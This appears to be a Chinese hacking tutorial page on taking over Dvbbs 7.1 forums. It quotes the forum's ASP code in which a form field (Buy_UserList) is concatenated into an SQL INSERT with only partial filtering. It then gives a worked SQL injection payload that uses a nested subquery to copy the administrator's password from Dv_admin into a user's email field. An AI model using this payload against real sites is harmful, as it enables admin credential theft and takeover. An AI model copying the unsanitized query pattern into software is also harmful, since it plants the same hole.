看到下面: ------------------------------ Dim Buy_Orders,Buy_VIPType,Buy_UserList Buy_Orders = Request.FORM("Buy_Orders") Buy_VIPType = Request.FORM("Buy_VIPType") Buy_UserList = Request.FORM("Buy_UserList") 取得变量的值 If Buy_Orders<>"" and IsNumeric(Buy_Orders) Then Buy_Orders = cCur(Buy_Orders) Else Buy_Orders = -1 End If If Not IsNumeric(Buy_VIPType) Then Buy_VIPType = 0 If Buy_UserList<>"" Then Buy_UserList = Replace(Replace(Replace(Buy_UserList,"|||",""),"@@@",""),"$PayMoney","") ToolsBuyUser = "0@@@"&Buy_Orders&"@@@"&Buy_VIPType&"@@@"&Buy_UserList&"|||$PayMoney|||" GetMoneyType = 3 'UseTools = ToolsInfo(4) End Select ------------------------------------
再朝下看: Public Sub Insert_To_Announce() '插入回复表 DIM UbblistBody UbblistBody = Content UbblistBody = Ubblist(Content) SQL="insert into "&TotalUseTable&"(Boardid,ParentID,username,topic,body,DateAndTime,length,RootID,layer,orders,ip,Expression,locktopic,signflag,emailflag,isbest,PostUserID,isupload,IsAudit,Ubblist,GetMoney,UseTools,PostBuyUser,GetMoneyType) values ("&Dvbbs.boardid&","&ParentID&",'"&username&"','"&topic&"','"&Content&"','"&DateTimeStr&"','"&Dvbbs.strlength(Content)&"',"&RootID&","&ilayer&","&iorders&",'"&Dvbbs.UserTrueIP&"','"&Expression(1)&"',"&locktopic&","&signflag&","&mailflag&",0,"&Dvbbs.userid&","&ihaveupfile&","&IsAudit&",'"&UbblistBody&"',"&ToMoney&",'"&UseTools&"','"&ToolsBuyUser&"',"&GetMoneyType&")" Dvbbs.Execute(sql)
解释一下注入: 注入语句形式 select(XXXX select(XXX select(*) XXXX) XXXXX) 可以嵌套查询, 比如: update Dv_User set UserEmail=77169@sohu.com where [UserName]='77169.com';-- 更新 表 设置 字段=77169@sohu.com 条件 用户名=77169.com 功能:将用户名为77169.com 的email 地址改成 77169@sohu.com 如果 77169@sohu.com是一个变量的话,如果这个变量没有过滤好,我们自己构造语句 77169@sohu.com=(select [Password] from Dv_admin where[Username]='yellowcat') 就成注入语句 update Dv_User set UserEmail=(select [Password] from Dv_admin where[Username]='yellowcat') where[UserName]='77169.com';--
[组图]通过dvbbs 7.1拿权限过程
您现在的位置: